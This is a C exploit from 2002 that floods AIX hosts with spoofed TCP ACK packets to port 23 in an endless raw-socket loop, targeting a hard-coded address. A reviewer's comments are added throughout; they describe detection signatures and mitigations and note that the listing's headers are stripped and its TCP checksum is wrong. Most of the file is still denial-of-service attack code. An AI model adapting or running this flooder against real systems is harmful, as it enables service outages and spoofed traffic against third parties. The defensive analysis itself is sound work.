/* This exploits a weakness in a function in the AIX kernel which handles the in/outgoing network connection. Setting no flags in the TCP header, causes a 100% CPU usage (DoS). Tested On IBM RS6000/SMP-M80/4) on AIX 4.3.3 2002 by gr33k - gr33k@frapes.org visit:[www.frapes.org] thanks: to the l337 ancient "Hephaestus" ;) greets: ZN+ixokratoria, terlega...*/

/*
 * NOTE(review): defender's summary of what this listing actually does.
 *
 * It is a raw-socket TCP flooder: it builds a 40-byte IPv4+TCP packet by
 * hand and sends it in an unbounded loop.  Despite the header comment
 * ("no flags"), the code sets tcp.ack=1 and clears every other flag, so
 * what leaves the host is a stream of bare ACK segments to TCP port 23
 * (telnet) with the source port, sequence number and IP id incremented on
 * every packet and a hard-coded source address written straight into the
 * IP header.  Those traits (bare ACKs to a single port, monotonically
 * increasing source port / seq / IP id, fixed 40-byte length, TTL 255,
 * window 512) are what a network sensor can key on.
 *
 * Standard mitigations for this class of flood apply: ingress rate
 * limiting or filtering of unsolicited ACKs at the perimeter, egress
 * filtering so hosts cannot emit packets whose source address is not
 * theirs (BCP 38), and running the affected system at a vendor-supported
 * fix level (none is named on this page).
 */

/* The header names are missing from this listing (they appear to have
 * been stripped when the page was captured, e.g. treated as HTML tags).
 * The bare directives below are reproduced exactly as found; as written
 * the file does not compile. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/*
 * Standard Internet one's-complement checksum over nbytes bytes at ptr
 * (the RFC 1071 algorithm): sums 16-bit words, pads a trailing odd byte,
 * folds the carries back in and returns the complement of the sum.
 *
 * ptr    : start of the data, read as 16-bit words (no alignment check;
 *          callers pass packed header structs)
 * nbytes : byte count, may be odd
 * returns: one's complement of the folded 16-bit sum
 *
 * There is no bounds checking: a length larger than the object behind
 * ptr is an out-of-bounds read.
 */
unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
    register long sum;          /* 'register' is only a hint (pre-C11 style) */
    u_short oddbyte;
    register u_short answer;

    sum=0;
    while(nbytes > 1) {
        sum+= *ptr++;
        nbytes-= 2;
    }
    if(nbytes == 1) {
        /* Place the last byte in the first byte of a zeroed 16-bit word so
           it is summed in the position it occupies in memory. */
        oddbyte = 0;
        *((u_char *) &oddbyte) = *(u_char *)ptr;
        sum += oddbyte;
    }
    sum = (sum >> 16) + (sum & 0xffff);  /* fold the 32-bit sum to 16 bits */
    sum += (sum >> 16);                  /* fold any carry produced by the fold */
    answer = ~sum;
    return(answer);
}

/*
 * Entry point.  Opens one raw IP socket and loops forever sending the same
 * hand-built packet with a few fields bumped on each iteration.  Nothing
 * is checked: the socket() and sendto() return values are ignored and the
 * loop has no exit, so the trailing return is unreachable.  Raw sockets
 * generally require elevated privileges.
 */
int main()
{
    int tcp_socket,j;                 /* j is declared but never used */
    static struct in_addr i;          /* never used */
    struct hostent *h;                /* never used */
    struct sockaddr_in sin;           /* only family/port/addr are set below; the
                                         remaining members stay uninitialised */
    struct send_tcp {
        struct iphdr ip;              /* glibc <netinet/ip.h> field names */
        struct tcphdr tcp;            /* glibc <netinet/tcp.h> bitfield flag names */
    }send_tcp;

    /* IPv4 header: 20 bytes (ihl=5), total length 40 = IP + TCP header, no
       payload.  Both addresses are hard-coded; the source address is written
       directly into the header rather than taken from the sending interface.
       The pid is reused as the initial IP id, TCP source port and sequence
       number (truncated to the width of each field). */
    send_tcp.ip.ihl=5;
    send_tcp.ip.version=4;
    send_tcp.ip.tos=0;
    send_tcp.ip.tot_len=htons(40);
    send_tcp.ip.id=getpid();          /* stored without htons */
    send_tcp.ip.frag_off=0;
    send_tcp.ip.ttl=255;
    send_tcp.ip.protocol=IPPROTO_TCP;
    send_tcp.ip.check=0;              /* recomputed for every packet in the loop */
    send_tcp.ip.saddr=inet_addr("192.168.0.4");
    send_tcp.ip.daddr=inet_addr("139.6.57.1");

    /* TCP header: 20 bytes (doff=5).  Only ACK is set; the "no flags" claim
       in the header comment does not match the code.  source and seq are
       stored without htons; dest is port 23 in network order. */
    send_tcp.tcp.source=getpid();
    send_tcp.tcp.dest=htons(23);
    send_tcp.tcp.seq=getpid();
    send_tcp.tcp.ack_seq=0;
    send_tcp.tcp.res1=0;
    send_tcp.tcp.doff=5;
    send_tcp.tcp.syn=0;
    send_tcp.tcp.fin=0;
    send_tcp.tcp.rst=0;
    send_tcp.tcp.psh=0;
    send_tcp.tcp.ack=1;
    send_tcp.tcp.urg=0;
    send_tcp.tcp.res2=0;
    send_tcp.tcp.window=htons(512);
    send_tcp.tcp.check=0;             /* recomputed for every packet in the loop */
    send_tcp.tcp.urg_ptr=0;

    /* sendto() destination; sin_port echoes the host-order source port. */
    sin.sin_family=AF_INET;
    sin.sin_port=send_tcp.tcp.source;
    sin.sin_addr.s_addr=send_tcp.ip.daddr;

    /* With IPPROTO_RAW the caller-supplied IP header is typically sent as-is.
       The return value is not checked, so a failed open (e.g. insufficient
       privilege) still falls into the loop below. */
    tcp_socket= socket(AF_INET,SOCK_RAW,IPPROTO_RAW);

    /* Unbounded send loop: no pacing, no error handling, no exit condition. */
    for(;;) {
        send_tcp.tcp.source++;
        send_tcp.ip.id++;
        send_tcp.tcp.seq++;
        send_tcp.tcp.check = 0;
        send_tcp.ip.check = 0;
        /* IP header checksum over the 20-byte IP header. */
        send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
        /* Copies the TCP header onto itself: source and destination are the
           same object, so this call has no effect. */
        bcopy((char *)&send_tcp.tcp, (char *)&send_tcp.tcp, 20);
        /* Checksums 32 bytes starting at the IP header (the 20 IP bytes plus
           the first 12 TCP bytes); this is not the range a TCP checksum is
           defined over. */
        send_tcp.tcp.check = in_cksum((unsigned short *)&send_tcp, 32);
        /* Return value ignored: send failures are silent. */
        sendto(tcp_socket, &send_tcp, 40, 0, (struct sockaddr *)&sin, sizeof(sin));
    }
    return 0;                         /* unreachable: the loop above never exits */
}